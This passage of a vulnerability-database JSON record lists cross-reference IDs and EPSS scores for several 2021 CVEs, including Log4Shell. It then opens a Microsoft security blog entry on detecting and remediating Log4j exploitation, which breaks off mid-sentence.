"99A0AA73-B93D-56EF-930D-4FD64A4F4D35", "9C874FAC-8640-5978-8C60-AF6528E5DF60", "9D8C431A-57F3-560C-8146-1232C2C029C2", "9DAC062A-CFE4-5BB0-983A-8BAB512CF589", "9E16D977-AA24-57C3-9BD1-98296F3186F5", "9E4C737D-2D3C-5A43-B638-E131903225BC", "9F3ABA17-E33A-5018-9DCB-AECDD8DE9DEE", "9FE4ADCA-7F2C-505F-AE74-C635FF2CDF75", "A1E14906-26B2-5DF8-95E3-07736CC5DDF2", "A39E4181-7C85-5B10-B0F9-AD286D09BD2A", "A454A9CC-C18E-56A1-B166-1A0E244E0493", "A4A33F39-BA6F-5AC0-B72C-30F0E4D6CD56", "A57FBD78-A654-5CEE-8291-163C8AFB7210", "A5B4FB6B-123B-544F-A4E4-46B0595C1C72", "A6308120-6A99-5D2D-A1F7-6384AC37959C", "AB801839-51E0-5EFE-B00D-ABBB6391399A", "ACB6C453-F1D5-5A65-91C2-DF455B997075", "AE0FE928-3464-53AA-BBD2-B3F9E871CEDD", "AF45D2D0-2D0E-5BD1-89DC-2E2C8E440A75", "AF987350-FFD2-5814-AF7B-55862F1A8AFE", "AFC5A984-3296-5D6A-AE73-0771AF4EDAF6", "B22E3A22-BF14-5660-977A-2D28D2AA2500", "B4A4F7BE-BF43-5BB6-A4A7-A22C6B9DDCA5", "B5D61CFC-8A10-5D92-B72B-D002C1D7AF33", "B6987F3B-86A1-5FDC-AD92-EAF6D264C14A", "B8D5B910-B397-520E-9526-FE32D86E93D8", "BADF55AF-60C5-5E33-BC19-5DC25FB9E196", "BD33CC4D-EC56-5A22-A712-1B23F8FB141D", "BE66A9B6-104B-5F49-918A-8B913CE46473", "BFBBD550-B2CF-524B-87F6-D0A8980CDFD3", "C0AE83D0-09A6-58EA-A244-1E453E699C04", "C1878361-BBB3-5A2F-8212-945883518690", "C20BAC49-21F2-5BE4-B97B-2561BD95A1A8", "C3153E8C-0590-5D96-8EDC-AEE7E129246E", "C3DA2A71-DD68-5EF3-AC4C-5A10DECD333B", "C3E394AB-E22C-5A6A-B5AF-2A497DDAC7BA", "C45EBEA7-DE2F-5373-9AA5-334E20EA2D23", "C5531AD4-9DFE-5A81-97D2-D34FD02E2AD6", "C640B511-D1E9-5F57-964D-3826F1C68DF8", "C6493FD0-579F-593F-A1E9-A44793F70419", "C68080B0-3163-5E76-AD65-2B454DBB95EE", "C6C5DB3A-FC0D-58BE-B769-D097420B7716", "C72759ED-7C42-593C-A3C7-94E2CDB2B105", "C7617E51-4166-5517-879D-6385309E13D8", "C76F7089-967B-5A7F-B8DA-629452876A2A", "C772DCBB-20D0-51DD-A580-F96689E65773", "C7EE8D86-B287-50F5-B8C2-05E11E510900", "C9E3963C-74AF-51D2-ACF7-7687E92D049F", "CA408205-D32D-5A33-B1AF-0B863641C7FC", "CA625124-9F92-5FCF-83A7-3ECF5F0EBBFB", "CA8D6F85-3A73-5070-B9A0-3A47FAE2C784", "CB9B5FAA-47CA-5D85-91B9-0AC5179D527B", "CBCB527D-3C29-5E5B-8C71-D7F20AB001D0", "CBEB0168-C1C9-5A9B-8B92-83E1054E44EA", "CC4175EB-3B91-5ABB-A700-84FC1105AAD5", "D02E385B-76D7-5BDB-A49C-CE858BEB0009", "D0B02251-DCA3-58B6-B887-D339C4EAABF9", "D0D92ADF-A58E-5221-9885-A030242C0EF0", "D21F1D28-2C44-5969-8F84-E5C6FF67DCFC", "D2602292-4969-564A-915E-2EFC6661FA35", "D298A3C8-E215-5549-B1A0-D01215070203", "D5003B3C-B1D9-5840-816F-1AFEBCAC7FD3", "D6EE5F29-18C9-5E59-B9E2-01DC93F5ACE9", "D72095BC-06C5-50B2-8F66-EC86811783D3", "D77DEF60-6E7D-5708-B9F2-DB4EA3E38C23", "D77EE79D-71A5-51BA-9A16-DC757F86CC50", "D813949A-183D-55ED-AF64-B130B8F95A56", "DA01F84A-9B1D-5337-A465-2A9AB088C056", "DAB5D6B4-8A2D-58C0-835F-DA4F27B2142D", "DB81B174-C3E8-5B08-80E4-A6D768400C4A", "DBBD6963-3870-5117-A829-3DE976AE90E2", "DE88B6AE-5D54-5B49-A097-57038C720463", "E0452D6A-51BC-51F5-9C1C-6CF01DA2805E", "E07C4625-66EE-5E09-880C-251E6273C21A", "E0A2EF02-5087-5522-ABA0-52F4142BB87B", "E1457E6C-87A3-5557-A3F2-175005D2A765", "E1ABFD41-98C8-576F-8509-5541B40FD442", "E1FC5745-FCD7-58AF-9F4D-65D94090BBAB", "E278D22E-7EC5-5A63-ADFC-EDEFDC650AA1", "E4E73A91-5275-59C0-AB2A-7F3EE83DDE28", "E655806B-A2A8-5BCB-A30A-0120CA3E97A6", "E6E03693-50B8-5AB4-B766-8464A228BA02", "E9B21C59-ED98-5B3B-A993-F1C214F8796C", "EA1AF0D9-1E6E-5080-BB7C-9D6035795FFB", "EA3173CE-C426-5047-864A-480B1A30F235", "EA3C5D7E-0CC8-5AEC-8D7F-3C245A834DDA", "EA906824-9149-507D-893C-87A7FED8998B", "EB648301-A198-5E4A-A72E-9639ED09F6C9", "EC0987E2-0001-5D63-A5AF-09675A5915BD", "EC35769F-2EAD-5464-8F97-D90F768E1E2D", "EDDA4558-9527-5BDE-86E3-23DDD0BA5443", "EE01D764-5F14-5C0A-BD77-8E32854C5216", "EFD098FC-90C8-5665-98B7-79C96C6AEBAE", "F14BCE6F-3415-59C7-AC9D-A5D7ABE1BB8E", "F1D342BE-E1E0-5B33-A19B-E2EB9E3E7C80", "F1E9BE6D-4024-56FB-80BB-B10ED5889144", "F208D311-79CA-5A2C-AE81-591BA4D30750", "F2F2719B-7041-5D1A-A95A-7617360B1D08", "F32DF396-0485-5F43-8A52-31B8DD252790", "F388C84A-40DA-58BC-BE0A-74C7E1712C54", "F3A40027-6DB5-509C-81CF-473DE3BEF46E", "F4C136DE-892B-5921-8475-E30BD548DDBB", "F523E799-3659-532F-8EED-40AD7F79E752", "F594470D-2599-5B2E-B317-C9720581C07D", "F7994B92-2846-5644-8B68-EFB6DFB95ED2", "FB593988-2CFC-5828-8229-9274AC7B0F86", "FB65C479-F4E7-58BA-BC4A-AED04F10A11C", "FB83113C-AABD-5893-8DDE-332B57F4FDD4", "FD65F47A-0B60-5F08-BFC2-1ABD16F49781", "FE8572DF-42D4-521C-B3DC-4715C2F9240D", "FEFA5AE8-5C94-5174-B44C-AC52B9AEAEAD"]}, {"type": "hackerone", "idList": ["H1:1423496", "H1:1427589", "H1:1438393"]}, {"type": "hivepro", "idList": ["HIVEPRO:205916945365E4C9EB9829951A82295A", "HIVEPRO:C0B03D521C5882F1BE07ECF1550A5F74", "HIVEPRO:E9C63D0D70D3232F21940B33FC205340"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20211215-01-LOG4J"]}, {"type": "ibm", "idList": ["06543959E3F80611BA94C3105900D725FA079835346EA88779BC4F272E259FC6", "08493CBA8B1A8F34C7786760C52C7997B8AE1C300A4CD3A03EEF9B528175E0E6", "11FEAADF6A94DFB6615A82EE0023D346C418ECD114C445A6BA52D50AA2C6FE0B", "1629CA1DFD389EEFF25556E8C9B707086E571E474449820E949D944C6EB994C3", "18578ECA481CB003C14A84CA7A47ACA060F579C24F4075A776AF26B575502960", "18A5E6C2581806177DE446AE26FCBC2EBB616C29B40041253F318FF51CE1AFB5", "1C6CC8129E7AEC5C314CCFD7570FC09548438820946E9774FD2E2410C0897958", "1CF787D3495FD84D3FB0E74685765A4270075CE576D888A960036582B4F83133", "23532FC7488A1E0A5525D86FA8B58841ED6086B69C02A7FBB104B3F98E2ED3CE", "2709A19D29B9047D230E570EBF5F26A53D322D557D88CBCFB480F1AFEEF6797C", "3092B1C0BAC8BA0F65979D37C5545C23B95C45DF35290A26827618ACF0E8B4E8", "4204EAC341D63510AAFE13D5F22BA14E92396D43569176E371BFB452611D1A97", "4271B86469CFCE465E783BEC3C9F3EDD13D645F55A5BEB697F3A4FCF694E568B", "4AB0975E08BC56107FE408EAB5B5BE88E706B439236C7F566A37398C9C1E0CCB", "519FF26BE329CC59BFF47E2AAC0D4B73FCA35BCF836D736A007D121863323E8C", "53949D71EE0D6BBA6C433F4DE402EC6D1ED7AA7877C8B84C15AD5E27FFEBE24E", "53D2631E5E76894870663A2B4948D3A4F72BDEEDF8C87935B788F981BEE5852B", "58868A8A56E187AE7CFDC0168A9534F5C483AC0F042B7ADF09CCBE3D8A901101", "68F256DC5E144D5A2404101E56A66160645897F9BB7E8600047077C626B2FE43", "6CB020CE84694787BB12E05DCB6CC95C33681B735ED0D48ED68FF5A99DD1D7A4", "6FCF3A6897C9A1A085633762339E7EC8DFE631B6D2A160FA5D1ADBC3E11F92E1", "78F199BD0B7C851B9B51668C7C03C7066EA862D4D07B5141F8116EE923472533", "7CCDD8E65FBE1F2581D0942E2116E4E61FB4753B4D48798C9D2BC8624C94826A", "7E846C52FF7D26445DCFC4472B6BC7E4EEADFD45513EDDFC6C395E9B800F576B", "8191B5D601C7F186266C65C8DC79A0B94EDA45737524796672F9272DD3278F4E", "8968C94B71BE086C952CFA8BF1B1924C1CF6FFECA8B8864B828E68AABA1D96E8", "8A20ED34CC4EABFD78A0599C47EC735B1923D5C4CE1DF595D753961732461EA4", "8FA41F50A028003D6689B034A6CA3E840361D121B9F4B4350B17EAB4605438C4", "9D21714C8A46FFA3AB195D14E14C9E6854AE7C8D7E68CC48DA42B63AB322B14A", "9D675243F41B597AEE7EC01ACEA307E5B73DA85724CE286F50180E2EF0DDC2E8", "9E08A11DD23150C79E969A8FA933F7C903468F74CE144600AC32149CD9CCC3CD", "A6A496B2E032EDA1F9C9B0D3982C6A52B7D925C02D0F2EFE157394C4851AEBA7", "AA3BDAF8E33B6E3ED2F924A99C734FE82BC738F506CB900388E32E3FD4CCDA88", "AC1B4BF839D3912B4646DFB21DA46EFE78B9249D5C29B4FAB631753998720DBE", "B1EA708CCF72B8264EA46A7D99E1616E7334C67D440D87A4F97B2B4087696EFD", "B47B01CFCEE320F0AE033C32D22579706D0B59585EDEDF3D908CA06FA3E92084", "B682A1DCF5A33AB9CBD3062B0DF0A131D5180AA2BBD201782B95DC8A2C33D1AA", "B7376C4EB80B7D4936C0682206BD2DC0AD5969B181368D3EB95A8FBA366BDB63", "BE7DD314CD7039219534B2612D0FEFD382DCC5D154AD49257A517A91FA728423", "C7FAA00C9C125584B8B9505CE7E7AC97AF7514904E37D2747A78CB0B5B0F3315", "CA111B4E9CA9EC240292C6D00FE0CF8C7559AC1453E3199BC3370D149FB11174", "CE291DB15FB1A7FDE49870DEF70725290D757902B5EB4009CD8DC9710150329D", "CE6A6F0970C169F7DBE65AA5DFCFCEC0BEA99E837906D043FD4B6D3BF7A87D67", "D928C805B6C7AD1BA5D5DA1EB77352559E54787E379CD22474A13592C0B83C20", "DCE05236BD35B28C109059A740CACEE5CE345130605BA9DEA39EFDA6BC532303", "E1810AD4BA382A8D222D20A49D11C634E6C5240D3F69652E51FC068062DED465", "E3F560319C0EA06228FA2D0D5412CFFD95B8D0963A65CBAC4B6D424BA4B7B434", "E636319395E5D666C247860149142969762B284D3BE296819A5644E6AE6DDA15", "E679F241D5F455DCABCB653D142792B97352015B6DD79A1EB36DB0B4D54B2902", "EBDD1B77CC71D5E7D7E88D21F7F8C7988F44B743E7ABCFC5258E806235EC65A9", "ED78D94545EF8A4A811D2C198EC427B8C46CA1FE3BBC9D6A2DC20DD440CB6FDC", "EFC94A6E1DA52C8EA7A5811D6A4381770FA24130DB4CFD911120046DD916261B"]}, {"type": "ics", "idList": ["ICSA-22-034-01"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:357497C932E21C66FB08D2C9B8EE9CA2", "IMPERVABLOG:BB63986B2DE2CCB2C65DD3747791097F", "IMPERVABLOG:BE9CCB7ADF74E2AEFC999FEE704CDE71", "IMPERVABLOG:BEE8EB9D446D0AF62464EE59DFA0CE0E", "IMPERVABLOG:DB0BBA5A6E2E523FAA7F7A73C45FEA96"]}, {"type": "kaspersky", "idList": ["KLA12224", "KLA12390", "KLA12391", "KLA12392", "KLA12393"]}, {"type": "kitploit", "idList": ["KITPLOIT:134021490040098714", "KITPLOIT:144331229809700743", "KITPLOIT:1680589374755422772", "KITPLOIT:3188944951765917430", "KITPLOIT:3773942873037113539", "KITPLOIT:4125185526326677098", "KITPLOIT:4333067961180534072", "KITPLOIT:4654779182065061303", "KITPLOIT:5104415481503400470", "KITPLOIT:522409803487164759", "KITPLOIT:5734436811250397170", "KITPLOIT:5789499291738758939", "KITPLOIT:6422486000446318290", "KITPLOIT:6759391622067035795", "KITPLOIT:7976092996345827446", "KITPLOIT:8031680161397698025", "KITPLOIT:8148701901300660800", "KITPLOIT:8266451932034361580", "KITPLOIT:8945091038325456871"]}, {"type": "krebs", "idList": ["KREBS:831FD0B726B800B2995A68BA50BD8BE3"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:39A05D4A4EC81966F7A1721DFACB3470", "MALWAREBYTES:42218FB85F05643E0B2C2C7D259EFEB5", "MALWAREBYTES:6A4862332586F98DA4761BE2B684752F", "MALWAREBYTES:A325F8FB1D527BD3C6C1C3A187840632"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/HTTP/LOG4SHELL_SCANNER/", "MSF:EXPLOIT/MULTI/HTTP/LOG4SHELL_HEADER_INJECTION/", "MSF:EXPLOIT/WINDOWS/HTTP/EXCHANGE_PROXYSHELL_RCE/"]}, {"type": "mmpc", "idList": ["MMPC:BB2F5840056D55375C4A19D2FF07C695"]}, {"type": "mscve", "idList": ["MS:CVE-2021-34473", "MS:CVE-2021-44228"]}, {"type": "mskb", "idList": ["KB5001779"]}, {"type": "msrc", "idList": ["MSRC:543F3A129A47F4B14FB170389908717B"]}, {"type": "mssecure", "idList": ["MSSECURE:42ECD98DCF925DC4063DE66F75FB5433", "MSSECURE:BB2F5840056D55375C4A19D2FF07C695"]}, {"type": "nessus", "idList": ["AL2_ALAS-2021-001.NASL", "AL2_ALAS-2021-1730.NASL", "AL2_ALAS-2021-1731.NASL", "ALA_ALAS-2021-1553.NASL", "APACHE_JSPWIKI_LOG4SHELL.NBIN", "APACHE_LOG4J_2_15_0.NASL", "APACHE_LOG4J_2_16_0.NASL", "APACHE_LOG4J_2_16_0_MAC.NASL", "APACHE_LOG4J_2_17_0.NASL", "APACHE_LOG4J_2_17_0_MAC.NASL", "APACHE_LOG4J_JDNI_LDAP_GENERIC.NBIN", "APACHE_LOG4J_JDNI_LDAP_GENERIC_HTTP_HEADERS.NBIN", "APACHE_LOG4J_JDNI_LDAP_GENERIC_TELNET.NBIN", "APACHE_LOG4J_JNDI_LDAP_GENERIC_RAW.NBIN", "APACHE_LOG4J_WIN_2_15_0.NASL", "APACHE_LOG4SHELL_CVE-2021-45056_DIRECT_CHECK.NBIN", "APACHE_LOG4SHELL_IMAP.NBIN", "APACHE_LOG4SHELL_NETBIOS.NBIN", "APACHE_LOG4SHELL_POP3.NBIN", "APACHE_LOG4SHELL_SMTP.NBIN", "APACHE_LOG4SHELL_SSH.NBIN", "APACHE_OFBIZ_LOG4SHELL.NBIN", "APACHE_SOLR_LOG4SHELL.NBIN", "CONFLUENCE_CONFSERVER-67940.NASL", "CONFLUENCE_CVE_2021_26084.NBIN", "DEBIAN_DLA-2842.NASL", "DEBIAN_DSA-5020.NASL", "DEBIAN_DSA-5022.NASL", "DEBIAN_DSA-5024.NASL", "FREEBSD_PKG_1EA05BB85D7411ECBB1E001517A2E1A4.NASL", "FREEBSD_PKG_3FADD7E4F8FB45A0A2188FD6423C338F.NASL", "FREEBSD_PKG_4B1AC5A35BD411EC8602589CFC007716.NASL", "FREEBSD_PKG_515DF85A5CD711ECA16D001517A2E1A4.NASL", "FREEBSD_PKG_650734B2766541709A0AEECED5E10A5E.NASL", "LOG4J_LOG4SHELL_FTP.NBIN", "LOG4J_LOG4SHELL_PPTP.NBIN", "LOG4J_LOG4SHELL_RPCBIND.NBIN", "LOG4J_LOG4SHELL_SIP_INVITE.NBIN", "LOG4J_LOG4SHELL_SMB.NBIN", "LOG4J_LOG4SHELL_WWW.NBIN", "OPENSUSE-2021-1577.NASL", "OPENSUSE-2021-1586.NASL", "OPENSUSE-2021-1601.NASL", "OPENSUSE-2021-3999.NASL", "OPENSUSE-2021-4094.NASL", "OPENSUSE-2021-4107.NASL", "OPENSUSE-2021-4109.NASL", "OPENSUSE-2021-4118.NASL", "SMB_NT_MS21_APR_EXCHANGE.NASL", "UBUNTU_USN-5192-1.NASL", "UBUNTU_USN-5192-2.NASL", "UBUNTU_USN-5197-1.NASL", "UBUNTU_USN-5203-1.NASL", "VMWARE_HORIZON_LOG4SHELL.NBIN", "VMWARE_VCENTER_LOG4SHELL.NBIN", "WEB_APPLICATION_SCANNING_112944", "WEB_APPLICATION_SCANNING_112961", "WEB_APPLICATION_SCANNING_112962", "WEB_APPLICATION_SCANNING_112963", "WEB_APPLICATION_SCANNING_112964", "WEB_APPLICATION_SCANNING_113075"]}, {"type": "oracle", "idList": ["ORACLE:CPUJAN2022"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:163895", "PACKETSTORM:164013", "PACKETSTORM:164122", "PACKETSTORM:165261", "PACKETSTORM:165270", "PACKETSTORM:165642"]}, {"type": "paloalto", "idList": ["PA-CVE-2021-44228"]}, {"type": "qt", "idList": ["QT:7EFAEDCED59EA2EE3AB98A0A484C5825"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:13C1A00A7D0A7B1BB16D0AB5B1E9B51A", "QUALYSBLOG:3FADA4B80DBBF178154C0729CFC1358F", "QUALYSBLOG:42335884011D582222F08AEF81D70B94", "QUALYSBLOG:5059D1C3913FB6542F3283A66F9B3A43", "QUALYSBLOG:68BBBF644900DA0A883AABB0E4E3F28B", "QUALYSBLOG:BC22CE22A3E70823D5F0E944CBD5CE4A", "QUALYSBLOG:C3C14B989683A02C2C9A98CE918FBC3C"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:03B1EB65D8A7CFE486943E2472225BA1", "RAPID7BLOG:078D5EE222682A75AE1A1A3A3684E38D", "RAPID7BLOG:18D49792276E208F17E7D64BCE2FDEF6", "RAPID7BLOG:2FFDE45F01FA44216BE91DD7AFA0D060", "RAPID7BLOG:3538F350FD08E0CFD124821C57A21C64", "RAPID7BLOG:4B35B23167A9D5E016537F6A81E4E9D4", "RAPID7BLOG:4CDB288231FA4BF52C0067D9D4FEABBF", "RAPID7BLOG:5CDF95FB2AC31414FD390E0E0A47E057", "RAPID7BLOG:6EADCD983283E3D546EF2907978E95F1", "RAPID7BLOG:7767347A5784FF1C4901601A1A21D2C8", "RAPID7BLOG:7B1DD656DC72802EE7230867267A5A16", "RAPID7BLOG:7F1312E79E0925118565C90443170051", "RAPID7BLOG:9CB105938BDE92F573A2DE68BC20CF46", "RAPID7BLOG:9F3C0081D4135E83F44053063F0E78EE", "RAPID7BLOG:A94573CD34833AE3602C45D8FAA89AD4", "RAPID7BLOG:B6DE24165AA9AA83EDA117170EDDAD44", "RAPID7BLOG:CB62092B4C7E70876CF276BA04DD7597", "RAPID7BLOG:D1E1A150733F5AFC2C704DB26E7EAB30", "RAPID7BLOG:E3D08ECAA9A93569D5544F4D6AAEEB74", "RAPID7BLOG:E43819A7DE1DD0F60E63E67A27B9301B", "RAPID7BLOG:F37BD0C67170721734A26D15E6D99B3E", "RAPID7BLOG:F9B4F18ABE4C32CD54C3878DD17A8630"]}, {"type": "redhat", "idList": ["RHSA-2022:0082", "RHSA-2022:0223"]}, {"type": "redhatcve", "idList": ["RH:CVE-2021-4104", "RH:CVE-2021-4125", "RH:CVE-2021-44228", "RH:CVE-2021-45046", "RH:CVE-2021-45105"]}, {"type": "securelist", "idList": ["SECURELIST:7A375F44156FACA25A0B3990F2CD73C1", "SECURELIST:9CC623A02615C07A9CEABD0C58DE7931", "SECURELIST:C540EBB7FD8B7FB9E54E119E88DB5C48"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2021:1577-1", "OPENSUSE-SU-2021:1586-1", "OPENSUSE-SU-2021:1601-1", "OPENSUSE-SU-2021:1605-1", "OPENSUSE-SU-2021:3999-1", "OPENSUSE-SU-2021:4094-1", "OPENSUSE-SU-2021:4107-1", "OPENSUSE-SU-2021:4109-1", "OPENSUSE-SU-2021:4118-1"]}, {"type": "symantec", "idList": ["SMNTC-19793"]}, {"type": "thn", "idList": ["THN:0468E8E1C5525F2A9F2ED37592AE0910", "THN:080602C4CECD29DACCA496697978CAD0", "THN:15D4F25153F9911661383B3B2153469D", "THN:16B3DB5DFBB6E86B79815E0E44D48021", "THN:1E1BEA193C556F91F471CD5B785B85B3", "THN:1E4DA950F02E02DFD1649B39A06A82C6", "THN:2656971C06C4E3D4B0A8C0AC02BBB775", "THN:317555CB8AA3A9E1AE70E218E44CC2EE", "THN:36D12A8768EE450B36B1C8D186F023E5", "THN:3E7257F45C71DCBDD0C320E7AAF383CA", "THN:4BC5D1A9ACDADBABF85BF51166D61386", "THN:5BAE3325983F971D1108722C454FF9AB", "THN:5BE77895D84D1FB816C73BB1661CE8EB", "THN:5CB7AEBFFE369D293598A4FDBFDFCEE3", "THN:5D8CEBFFF41D128545CD83F6F45D68F4", "THN:602D65D576B090BAC4B0C96998F8F922", "THN:656628F2B0FBE9789F4434FCAFFBCFE1", "THN:668DE2C9CFD709125451AF8F3FE12E6C", "THN:683B509BDB84EA9FEBCF0B1EE68D0C08", "THN:686DDFA07B415C41BA7AB9B8970557EF", "THN:6E47D45D685F44083BE0A6763799D209", "THN:76D7572EDBE770410D6F0518DAD8B0AD", "THN:833B2B9623F1C64D20868B947E8BE4E0", "THN:83D31EE6B3E59778D812B3B7E67D7CD6", "THN:88184AFF85BF7EC0848D95E6BB0BEDB4", "THN:933FE23273AB5250B949633A337D44E1", "THN:9C12FFDB69779929861327CF77B13726", "THN:9FD8A70F9C17C3AF089A104965E48C95", "THN:A12549603E494D035DF4BABEC04EBD5D", "THN:AFF2BD38CB9578D0F4CA96A145933627", "THN:C221700D7BBC27110090E137F7288FA3", "THN:C4188C7A44467E425407D33067C14094", "THN:DC2D78987D283D806FF145511EF10596", "THN:E006E516DD134F047ED991AC23F057A4", "THN:F076354512CA34C263F222F3D62FCB1E", "THN:F8D94BE25D6D25E0F52FB4433E619721", "THN:FA40708E1565483D14F9A31FC019FCE1", "THN:FADB0A82C9DCE0870E617D4A8E5A34A6"]}, {"type": "threatpost", "idList": ["THREATPOST:042D7C606FEB056B462B0BFB61E59917", "THREATPOST:065F7608AC06475E765018E97F14998D", "THREATPOST:10D0F1DDDD6C211DA3CE6395900B7C54", "THREATPOST:187B01687ED5D3975CD6E42E84DD9B13", "THREATPOST:27C5AA551B5793DEA8848FB76DE52B32", "THREATPOST:34D98758A035C36FED68DDD940415845", "THREATPOST:38E8D69F26ADB15A989532924B2A98C4", "THREATPOST:3A5F59D56E40560C393A3F69A362A31B", "THREATPOST:46837E7270195429E1D891848E911254", "THREATPOST:49177F7B5015CE94637C97F64C2D4138", "THREATPOST:4B2E19CAF27A3EFBCB2F777C6E528317", "THREATPOST:4D63851D1493E3861204B674ADBC7F01", "THREATPOST:5B9D3D8DB4BFEDE846215C1877B275ED", "THREATPOST:5CCE0C2607242B16B2880B331167526C", "THREATPOST:705B9DD7E8602B9F2F913955E25C2550", "THREATPOST:76A5549135F9D578FFC2C8FACC135193", "THREATPOST:83C349A256695022C2417F465CEB3BB2", "THREATPOST:89AA48C3C48FA427AB660EDEE6DBCBE2", "THREATPOST:8A372065BFA1E6839DAF0386E9D8A1F5", "THREATPOST:98D815423018872E6E596DAA8131BF3F", "THREATPOST:AFD74E86954C5A08B3F246887333BDF3", "THREATPOST:B318814572E066732E6C32CC147D95E2", "THREATPOST:D098942E4435832E619282E1B92C9E0F"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:1333714193E63A3E616DE66054C5D640", "TRENDMICROBLOG:608F794950B54766A75ABA93823701D0", "TRENDMICROBLOG:C927C873A9E9A7AF6B74D64EFAFA6B02"]}, {"type": "ubuntu", "idList": ["USN-5192-1", "USN-5192-2", "USN-5197-1", "USN-5203-1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2021-44228", "UB:CVE-2021-45046", "UB:CVE-2021-45105"]}, {"type": "vmware", "idList": ["VMSA-2021-0028.9"]}, {"type": "wallarmlab", "idList": ["WALLARMLAB:060FBB90648BCDE11554492408AE89C8", "WALLARMLAB:2AAA5E62EED6807B93FB40361B4927CB", "WALLARMLAB:90D3FFE69FF928689D36310EF8B1C4F3", "WALLARMLAB:E86F01AF50087BEB03AAB46947CDE884"]}, {"type": "zdi", "idList": ["ZDI-21-1541", "ZDI-21-821"]}, {"type": "zdt", "idList": ["1337DAY-ID-36667", "1337DAY-ID-36694", "1337DAY-ID-36730", "1337DAY-ID-37135", "1337DAY-ID-37136", "1337DAY-ID-37257"]}]}, "exploitation": null, "epss": [{"cve": "CVE-2021-26084", "epss": "0.974760000", "percentile": "0.999340000", "modified": "2023-03-17"}, {"cve": "CVE-2021-34473", "epss": "0.974090000", "percentile": "0.998460000", "modified": "2023-03-17"}, {"cve": "CVE-2021-35247", "epss": "0.003290000", "percentile": "0.663670000", "modified": "2023-03-18"}, {"cve": "CVE-2021-44228", "epss": "0.975780000", "percentile": "0.999980000", "modified": "2023-03-18"}, {"cve": "CVE-2021-44428", "epss": "0.009380000", "percentile": "0.806950000", "modified": "2023-03-18"}, {"cve": "CVE-2021-44832", "epss": "0.071980000", "percentile": "0.929430000", "modified": "2023-03-18"}, {"cve": "CVE-2021-45046", "epss": "0.974160000", "percentile": "0.998510000", "modified": "2023-03-18"}, {"cve": "CVE-2021-45105", "epss": "0.972620000", "percentile": "0.996990000", "modified": "2023-03-18"}], "vulnersScore": 0.2}, "_state": {"dependencies": 1659988328, "score": 1684013037, "epss": 1679165106}, "_internal": {"score_hash": "c39d08e20274d900cd3ace0fc79f4d96"}}

{"mssecure": [{"lastseen": "2022-01-19T21:27:16", "description": "**_January 10, 2022 recap \u2013_**_ The Log4j vulnerabilities represent a complex and high-risk situation for companies across the globe. This open-source component is widely used across many suppliers\u2019 software and services. By nature of Log4j being a component, the vulnerabilities affect not only applications that use vulnerable libraries, but also any services that use these applications, so customers may not readily know how widespread the issue is in their environment. Customers are encouraged to utilize scripts and scanning tools to assess their risk and impact. Microsoft has observed attackers using many of the same inventory techniques to locate targets. Sophisticated adversaries (like nation-state actors) and commodity attackers alike have been observed taking advantage of these vulnerabilities. There is high potential for the expanded use of the vulnerabilities._\n\n_In January, we started seeing attackers taking advantage of the vulnerabilities in internet-facing systems, eventually deploying ransomware._ _We have observed many existing attackers adding exploits of these vulnerabilities in their existing malware kits and tactics, from coin miners to hands-on-keyboard attacks. Organizations may not realize their environments may already be compromised. Microsoft recommends customers to do additional review of devices where vulnerable installations are discovered. At this juncture, customers should assume broad availability of exploit code and scanning capabilities to be a real and present danger to their environments. Due to the many software and services that are impacted and given the pace of updates, this is expected to have a long tail for remediation, requiring ongoing, sustainable vigilance._\n\n_**January 19, 2022 update** - We added new information about an unrelated vulnerability we discovered while investigating Log4j attacks._\n\nThe remote code execution (RCE) vulnerabilities in Apache Log4j 2 referred to as \u201cLog4Shell\u201d ([CVE-2021-44228](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-44228>), [CVE-2021-45046](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>), [CVE-2021-44832](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-44832>)) has presented a new attack vector and gained broad attention due to its severity and potential for widespread exploitation. The majority of attacks we have observed so far have been mainly mass-scanning, coin mining, establishing remote shells, and red-team activity, but it\u2019s highly likely that attackers will continue adding exploits for these vulnerabilities to their toolkits.\n\nWith nation-state actors testing and implementing the exploit and known ransomware-associated access brokers using it, we highly recommend applying security patches and updating affected products and services as soon as possible. Refer to the [Microsoft Security Response Center blog](<https://msrc-blog.microsoft.com/2021/12/11/microsofts-response-to-cve-2021-44228-apache-log4j2/>) for technical information about the vulnerabilities and mitigation recommendations.\n\nMeanwhile, defenders need to be diligent in detecting, hunting for, and investigating related threats. This blog reports our observations and analysis of attacks that take advantage of the Log4j 2 vulnerabilities. It also provides our recommendations for using Microsoft security solutions to (1) find and remediate vulnerable services and systems and (2) detect, investigate, and respond to attacks.\n\nThis blog covers the following topics:\n\n 1. **Attack vectors and observed activity**\n 2. **Finding and remediating vulnerable apps and systems**\n * Threat and vulnerability management\n * Discovering affected components, software, and devices via a unified Log4j dashboard\n * Applying mitigation directly in the Microsoft 365 Defender portal\n * Microsoft 365 Defender advanced hunting\n * Microsoft Defender for Cloud\n * Microsoft Defender for servers\n * Microsoft Defender for Containers\n * Microsoft Sentinel queries\n * RiskIQ EASM and Threat Intelligence\n 3. **Detecting and responding to exploitation attempts and other related attacker activity**\n * Microsoft 365 Defender\n * Microsoft Defender Antivirus\n * Microsoft Defender for Endpoint\n * Microsoft Defender for Cloud Apps\n * Microsoft Defender for Office 365\n * Microsoft 365 Defender advanced hunting\n * Microsoft Defender for Cloud\n * Microsoft Defender for IoT\n * Microsoft Sentinel\n * Microsoft Sentinel queries\n * Azure Firewall Premium\n * Azure Web Application Firewall (WAF)\n 4. **Indicators of compromise (IoCs)**\n\n## Attack vectors and observed activity\n\nMicrosoft\u2019s unified threat intelligence team, comprising the Microsoft Threat Intelligence Center (MSTIC), Microsoft 365 Defender Threat Intelligence Team, RiskIQ, and the Microsoft Detection and Response Team (DART), among others, have been tracking threats taking advantage of the remote code execution (RCE) vulnerabilities in [Apache Log4j 2](<https://logging.apache.org/log4j/2.x/>) referred to as \u201cLog4Shell\u201d.\n\nThe bulk of attacks that Microsoft has 